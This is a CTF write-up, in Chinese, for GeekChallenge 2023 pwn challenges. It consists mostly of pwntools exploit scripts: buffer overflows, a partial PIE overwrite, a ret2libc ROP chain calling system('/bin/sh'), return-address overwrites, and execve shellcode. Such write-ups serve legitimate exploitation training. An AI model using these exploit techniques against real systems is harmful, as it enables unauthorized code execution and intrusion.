GeekChallenge 2023 wp pwn 部分题解

nc pwntools

from pwn import *
p=remote("pwn.node.game.sycsec.com",31441)
context(arch="amd64",os="linux",log_level="debug")


pd1 = b'a'*92 + b'\x53\x79\x63\x6c\x6F\x76\x65\x72'
p.recvuntil(b'This string need to be 100 characters long')

p.send(pd1)

p.recvuntil(b'2.This challenge is harder than first one')
calc = p.recvuntil('=',drop=True)
p.sendline(str(eval(calc)))

p.interactive()

ret2text

开了pie，最后三位不变，直接改最后一位字节就可以跳转到backdoor

from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=remote("pwn.node.game.sycsec.com",31396)

pd = b'a' * (0x50 + 8) + b'\x27'
p.send(pd)

p.interactive() 

ret2libc

泄露gets的地址，要在附件中找到这个片段mov_edx_edi_eax，其他的都很常规

from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=remote("pwn.node.game.sycsec.com",30616)
elf=ELF("/home/feichai/ctf_file/chal")
libc=ELF("/home/feichai/ctf_file/libc.so.6")

write_plt = elf.plt.write
gets_got = elf.got.gets
vuln = elf.sym.vuln

pop_rdi = 0x0000000000401333
pop_rsi_r15 = 0x0000000000401331
mov_edx_edi_eax = 0x0000000000401288

offset = b'a\x00' + b'a' * (0x10 + 6)

pd = offset
pd += p64(pop_rsi_r15) + p64(gets_got) + p64(1)
pd += p64(mov_edx_edi_eax)

p.sendlineafter(b"This challenge no backdoor!",pd)

gets_addr = u64(p.recv()[:8])
info("gets_addr:%#x",gets_addr)

libc_base = gets_addr - libc.symbols[b'gets']
libc_system = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

pd2 = offset + p64(pop_rdi) + p64(bin_sh_addr) + p64(libc_system)
p.sendlineafter(b"This challenge no backdoor!",pd2)

p.interactive() 

password

直接爆破，密码是随机数，第一个字节有256种情况，爆破到第一个字节为\x00的时候就通了

#coding=utf-8
from pwn import *
context(arch="amd64",os="linux",log_level="debug")

backdoor = 0x4012F3

res = b'Wrong'
while b'Wrong' in res:

    p=remote("pwn.node.game.sycsec.com",30542)
    p.recvuntil("please enter user name:")
    pd = b'a'*(0x20+8) + p64(backdoor)
    p.sendline(pd)

    p.recvuntil("please enter password:")
    p.sendline(b'')
    res = p.recv(10)


p.interactive() 

write1

第一个scanf传什么没什么关系，随便传，利用for循环内指针改返回地址

#coding=utf-8
from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=remote("pwn.node.game.sycsec.com",31848)

return_addr = 0x40134D
backdoor = 0x401225

pd = b'\x11\x22\x33\x44\x55\x66\x77\x88'
p.sendline(pd)

p.recvuntil(b"index:")
p.sendline(b'40')

p.recvuntil(b"value:")
p.sendline(b'-28')

p.recvuntil(b"index:")
p.sendline(b'41')

p.recvuntil(b"value:")
p.sendline(b'-1')

p.recvuntil(b"index:")
p.sendline(b'-1')

p.interactive() 

write2

第一个scanf传入shellcode，再修改返回地址回到shellcode

from pwn import *
context(arch="amd64",os="linux",log_level="debug")
p=remote("pwn.node.game.sycsec.com",31409)

shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

p.recvuntil(b"index_addr:0x")
v1_addr = int(p.recv(12),16)+4
hax_v1_addr = hex(v1_addr)
v2_addr= hax_v1_addr[2:]
info("v2_addr:%s",v2_addr)

p.sendline(shellcode)

for i in range(0,11,2):
    p.recvuntil(b"index:")
    p.sendline(str(int(40+i/2)))

    p.recvuntil(b"value:")
    p.sendline(v2_addr[11-i-1:11-i+1])

p.recvuntil(b"index:")
p.sendline(b'-1')

p.interactive()